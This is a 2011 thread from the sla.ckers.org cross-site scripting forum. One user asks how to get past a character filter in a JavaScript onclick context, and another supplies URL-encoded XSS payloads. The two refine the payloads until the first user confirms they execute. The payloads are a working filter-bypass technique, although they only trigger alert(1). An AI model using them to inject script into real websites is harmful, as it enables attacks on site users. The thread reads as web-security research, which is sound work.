Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
XSS in JavaScript context, Filtered
Posted by: cykyc
Date: February 11, 2011 10:35AM

Hey All,

Saw this across the tubes:

javascript:window.location.href='some.page?param1=value&param2=[user-content-here]';

Outside of alphanum, these are allowed: ', ./_%@-^\r\n?&

And these are removed: +=;(){}[]#$"`*\

So, I can add parameters and values via URL encoding. I can escape the string but I'm clueless what to do without parentheses or the equal sign. (This is normal since I'm clueless in general.) And I really don't see a vector to do much else. Do you? If so, wanna clue me in? :-)

Options: ReplyQuote
Re: XSS in JavaScript context, Filtered
Posted by: LeverOne
Date: February 11, 2011 11:00AM

'&&'javascript:%61%6C%65%72%74%28%31%29//

If -->:<-- is not filtered.

----------------------
~Veritas~



Edited 1 time(s). Last edit at 02/11/2011 11:02AM by LeverOne.

Options: ReplyQuote
Re: XSS in JavaScript context, Filtered
Posted by: cykyc
Date: February 11, 2011 11:41AM

Thanks for the reply LeverOne!

I apologize, forgot to state when ampersand is passed in via a POST as %26, it's returned as &amp; in the context. And, yes, forgot to state that colon : is allowed through. But, the parentheses will get filtered out. I tried double URL encoding (%2528) but that just shows up as %28 in the context.

And the last thing I forgot was this JavaScript context was in an onclick event in a Cancel button:

<input type="button" id="" class="someclass" value="Cancel" onclick="javascript:window...">

So, using this:
'%26%26javascript:alert%25281%2529//

Returned this:
<input ... onclick="javascript:window.location.href='...'&amp;&amp;javascript:alert%281%29//';">

Options: ReplyQuote
Re: XSS in JavaScript context, Filtered
Posted by: LeverOne
Date: February 11, 2011 12:00PM

// Returned this:
<input ... onclick="javascript:window.location.href='...'&amp;&amp;javascript:alert%281%29//';">


That should work! You missed a quote.

'%26%26'javascript:alert%25281%2529//

Should return:

<input ... onclick="javascript:window.location.href='...'&amp;&amp;'javascript:alert%281%29//';">



// I owe you a beverage...

Maybe one day, thanks. :)

----------------------
~Veritas~



Edited 1 time(s). Last edit at 02/11/2011 02:24PM by LeverOne.

Options: ReplyQuote
Re: XSS in JavaScript context, Filtered
Posted by: cykyc
Date: February 11, 2011 12:29PM

And it does! I owe you a beverage of your choosing :-)

Options: ReplyQuote


Sorry, only registered users may post in this forum.